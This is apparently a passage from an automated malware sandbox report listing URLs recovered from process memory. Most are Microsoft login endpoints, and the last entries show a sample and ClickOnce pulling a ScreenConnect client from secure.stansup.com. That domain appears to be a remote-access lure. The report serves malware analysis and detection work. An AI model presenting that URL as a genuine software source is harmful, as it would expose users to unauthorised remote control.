                  Source: svchost.exe, 00000008.00000002.2688956884.00000189C562B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                  Source: svchost.exe, 00000008.00000003.1468908304.00000189C5F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2689020109.00000189C565E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468951555.00000189C5F40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468974128.00000189C5F63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ApproveSession.srf
                  Source: svchost.exe, 00000008.00000003.1468602840.00000189C5F29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1469232936.00000189C5F56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468719618.00000189C5F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80600
                  Source: svchost.exe, 00000008.00000003.1468602840.00000189C5F29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1469232936.00000189C5F56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468719618.00000189C5F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80601
                  Source: svchost.exe, 00000008.00000002.2689020109.00000189C565E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468974128.00000189C5F63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1469017159.00000189C5F6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80502
                  Source: svchost.exe, 00000008.00000002.2689020109.00000189C565E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468974128.00000189C5F63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1469017159.00000189C5F6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80600
                  Source: svchost.exe, 00000008.00000002.2689020109.00000189C565E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468974128.00000189C5F63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1469017159.00000189C5F6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468602840.00000189C5F2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80601
                  Source: svchost.exe, 00000008.00000003.1468908304.00000189C5F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2688987520.00000189C5644000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468951555.00000189C5F40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ListSessions.srf
                  Source: svchost.exe, 00000008.00000003.1468908304.00000189C5F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2689020109.00000189C565E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468951555.00000189C5F40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468974128.00000189C5F63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageApprover.srf
                  Source: svchost.exe, 00000008.00000003.1468908304.00000189C5F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2689020109.00000189C565E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468951555.00000189C5F40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468974128.00000189C5F63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageLoginKeys.srf
                  Source: svchost.exe, 00000008.00000002.2688956884.00000189C562B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/RST2.srf
                  Source: svchost.exe, 00000008.00000002.2688956884.00000189C562B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/didtou.srf
                  Source: svchost.exe, 00000008.00000003.1468908304.00000189C5F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2688987520.00000189C5644000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468951555.00000189C5F40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/getrealminfo.srf
                  Source: svchost.exe, 00000008.00000003.1468908304.00000189C5F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2688987520.00000189C5644000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468951555.00000189C5F40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2689797301.00000189C5F37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/getuserrealm.srf
                  Source: svchost.exe, 00000008.00000002.2688956884.00000189C562B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468974128.00000189C5F63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1469017159.00000189C5F6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceAssociate.srf
                  Source: svchost.exe, 00000008.00000002.2688956884.00000189C562B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468974128.00000189C5F63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1469017159.00000189C5F6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceDisassociate.srf
                  Source: svchost.exe, 00000008.00000003.1469053153.00000189C5F27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceDisassociate.srff
                  Source: svchost.exe, 00000008.00000002.2689020109.00000189C565E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceDisassociate.srfuer
                  Source: svchost.exe, 00000008.00000002.2688956884.00000189C562B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468974128.00000189C5F63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceQuery.srf
                  Source: svchost.exe, 00000008.00000002.2688956884.00000189C562B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468974128.00000189C5F63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1469017159.00000189C5F6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1469053153.00000189C5F27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceUpdate.srf
                  Source: svchost.exe, 00000008.00000002.2688956884.00000189C562B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468974128.00000189C5F63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1469017159.00000189C5F6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/EnumerateDevices.srf
                  Source: svchost.exe, 00000008.00000003.1469053153.00000189C5F27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/EnumerateDevices.srfX
                  Source: svchost.exe, 00000008.00000003.1468908304.00000189C5F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2689020109.00000189C565E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468951555.00000189C5F40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468974128.00000189C5F63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetAppData.srf
                  Source: svchost.exe, 00000008.00000002.2688987520.00000189C5644000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetAppData.srfrfrf6085fid=cpsrf
                  Source: svchost.exe, 00000008.00000003.1468974128.00000189C5F63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1469017159.00000189C5F6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetUserKeyData.srf
                  Source: svchost.exe, 00000008.00000002.2689020109.00000189C565E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetUserKeyData.srfuer
                  Source: svchost.exe, 00000008.00000002.2689020109.00000189C565E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468974128.00000189C5F63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1469017159.00000189C5F6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468602840.00000189C5F2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srf
                  Source: svchost.exe, 00000008.00000003.1468908304.00000189C5F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468602840.00000189C5F29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1469232936.00000189C5F56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468719618.00000189C5F52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468951555.00000189C5F40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468974128.00000189C5F63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80600
                  Source: svchost.exe, 00000008.00000002.2688987520.00000189C5644000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80600UE
                  Source: svchost.exe, 00000008.00000003.1468908304.00000189C5F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468602840.00000189C5F29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2689020109.00000189C565E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468719618.00000189C5F52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468951555.00000189C5F40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468974128.00000189C5F63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80601
                  Source: svchost.exe, 00000008.00000003.1468908304.00000189C5F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468602840.00000189C5F29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2689020109.00000189C565E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468951555.00000189C5F40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468974128.00000189C5F63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80603
                  Source: svchost.exe, 00000008.00000003.1468602840.00000189C5F29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2689020109.00000189C565E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468719618.00000189C5F52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468974128.00000189C5F63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80604
                  Source: svchost.exe, 00000008.00000002.2689862516.00000189C5F6D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2689020109.00000189C565E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468974128.00000189C5F63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1469017159.00000189C5F6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srf
                  Source: svchost.exe, 00000008.00000003.1468602840.00000189C5F2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srfm
                  Source: svchost.exe, 00000008.00000003.1468974128.00000189C5F63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80502
                  Source: svchost.exe, 00000008.00000003.1468908304.00000189C5F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468951555.00000189C5F40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=805021
                  Source: svchost.exe, 00000008.00000002.2688987520.00000189C5644000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80502R
                  Source: svchost.exe, 00000008.00000003.1468908304.00000189C5F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468602840.00000189C5F29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2688987520.00000189C5644000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468951555.00000189C5F40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468974128.00000189C5F63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80600
                  Source: svchost.exe, 00000008.00000003.1468908304.00000189C5F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468602840.00000189C5F29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1469232936.00000189C5F56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2688987520.00000189C5644000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468719618.00000189C5F52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468951555.00000189C5F40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468974128.00000189C5F63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80601
                  Source: svchost.exe, 00000008.00000003.1468908304.00000189C5F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468602840.00000189C5F29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2689020109.00000189C565E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468719618.00000189C5F52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468951555.00000189C5F40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80603
                  Source: svchost.exe, 00000008.00000003.1468719618.00000189C5F52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468951555.00000189C5F40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468974128.00000189C5F63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80604
                  Source: svchost.exe, 00000008.00000003.1468602840.00000189C5F29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2689020109.00000189C565E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468719618.00000189C5F52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468974128.00000189C5F63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80605
                  Source: svchost.exe, 00000008.00000003.1468602840.00000189C5F29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2689020109.00000189C565E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468719618.00000189C5F52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468974128.00000189C5F63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80606
                  Source: svchost.exe, 00000008.00000003.1468602840.00000189C5F29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2689020109.00000189C565E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468719618.00000189C5F52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468974128.00000189C5F63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80607
                  Source: svchost.exe, 00000008.00000003.1468602840.00000189C5F29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468931306.00000189C5F57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2689020109.00000189C565E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468719618.00000189C5F52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468974128.00000189C5F63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80608
                  Source: svchost.exe, 00000008.00000003.1468602840.00000189C5F29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468719618.00000189C5F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp
                  Source: svchost.exe, 00000008.00000002.2688987520.00000189C5644000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468698344.00000189C5F5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468602840.00000189C5F2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp
                  Source: svchost.exe, 00000008.00000003.1468602840.00000189C5F29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2689020109.00000189C565E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468719618.00000189C5F52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468974128.00000189C5F63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80605
                  Source: svchost.exe, 00000008.00000003.1468908304.00000189C5F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2689020109.00000189C565E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468951555.00000189C5F40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468974128.00000189C5F63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/ResolveUser.srf
                  Source: svchost.exe, 00000008.00000002.2688956884.00000189C562B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468974128.00000189C5F63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srf
                  Source: svchost.exe, 00000008.00000002.2690008650.00000189C642D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srfA
                  Source: svchost.exe, 00000008.00000002.2689020109.00000189C565E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srfe
                  Source: svchost.exe, 00000008.00000003.1468908304.00000189C5F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468951555.00000189C5F40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srff
                  Source: svchost.exe, 00000008.00000002.2688956884.00000189C562B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceaddcredential.srf
                  Source: svchost.exe, 00000008.00000002.2688956884.00000189C562B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468974128.00000189C5F63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/devicechangecredential.srf
                  Source: svchost.exe, 00000008.00000002.2688956884.00000189C562B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468974128.00000189C5F63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceremovecredential.srf
                  Source: svchost.exe, 00000008.00000002.2688987520.00000189C5644000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceremovecredential.srfLive
                  Source: svchost.exe, 00000008.00000002.2688956884.00000189C562B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/resetpw.srf
                  Source: svchost.exe, 00000008.00000003.1468908304.00000189C5F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468951555.00000189C5F40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/resetpw.srfe
                  Source: svchost.exe, 00000008.00000003.1468908304.00000189C5F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2688987520.00000189C5644000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468951555.00000189C5F40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/retention.srf
                  Source: svchost.exe, 00000008.00000002.2689297408.00000189C56D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com:443/RST2.srf
                  Source: svchost.exe, 00000008.00000002.2690289231.00000189C6487000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.comgdi
                  Source: svchost.exe, 00000008.00000003.1468908304.00000189C5F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2689020109.00000189C565E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468951555.00000189C5F40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468974128.00000189C5F63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/MSARST2.srf
                  Source: svchost.exe, 00000008.00000003.1468908304.00000189C5F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468951555.00000189C5F40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468974128.00000189C5F63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceAssociate.srf
                  Source: svchost.exe, 00000008.00000002.2688987520.00000189C5644000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceAssociate.srfJ
                  Source: svchost.exe, 00000008.00000002.2688987520.00000189C5644000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf.
                  Source: svchost.exe, 00000008.00000003.1468678889.00000189C5F10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf:CLSID
                  Source: svchost.exe, 00000008.00000003.1468908304.00000189C5F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468951555.00000189C5F40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468974128.00000189C5F63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceQuery.srf
                  Source: svchost.exe, 00000008.00000002.2688987520.00000189C5644000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceQuery.srf-
                  Source: svchost.exe, 00000008.00000003.1468908304.00000189C5F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468951555.00000189C5F40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468974128.00000189C5F63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceUpdate.srf
                  Source: svchost.exe, 00000008.00000002.2688987520.00000189C5644000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceUpdate.srf%
                  Source: svchost.exe, 00000008.00000003.1468908304.00000189C5F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2688987520.00000189C5644000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468951555.00000189C5F40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468974128.00000189C5F63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/EnumerateDevices.srf
                  Source: svchost.exe, 00000008.00000003.1468908304.00000189C5F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2688987520.00000189C5644000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468951555.00000189C5F40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468974128.00000189C5F63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/ResolveUser.srf
                  Source: svchost.exe, 00000008.00000003.1468678889.00000189C5F10000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2688987520.00000189C5644000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceaddmsacredential.srf
                  Source: svchost.exe, 00000008.00000002.2688987520.00000189C5644000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/devicechangecredential.srf
                  Source: svchost.exe, 00000008.00000003.1469053153.00000189C5F27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/devicechangecredential.srfMM
                  Source: svchost.exe, 00000008.00000003.1468678889.00000189C5F10000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2688987520.00000189C5644000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceremovecredential.srf
                  Source: svchost.exe, 00000008.00000003.1468678889.00000189C5F10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceremovecredential.srfRE
                  Source: dfsvc.exe, 00000002.00000002.2474748099.000001D43F26F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.staP
                  Source: dfsvc.exe, 00000002.00000002.2474748099.000001D43EF44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.staP2
                  Source: dfsvc.exe, 00000002.00000002.2495260176.000001D4592E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansa
                  Source: dfsvc.exe, 00000002.00000002.2495260176.000001D4592E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.c
                  Source: dfsvc.exe, 00000002.00000002.2474748099.000001D43F26F000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2474748099.000001D43EDD7000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2474748099.000001D43EF44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com
                  Source: khwHsyfsJ1.exe, 00000000.00000002.1531872432.0000000000A6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/B
                  Source: dfsvc.exe, 00000002.00000002.2495433381.000001D45930D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin
                  Source: dfsvc.exe, 00000002.00000002.2495260176.000001D4592E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreeTX
                  Source: dfsvc.exe, 00000002.00000002.2494124496.000001D4591E6000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1831273975.0000000002DBF000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1831273975.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1831031764.0000000001194000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1830621372.0000000001130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.application
                  Source: dfsvc.exe, 00000002.00000002.2494124496.000001D4591E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.application#
                  Source: dfsvc.exe, 00000002.00000002.2495433381.000001D45930D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.application#Scre0
                  Source: dfsvc.exe, 00000002.00000002.2495260176.000001D4592E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.application#ScreenConnect.WindowsCli
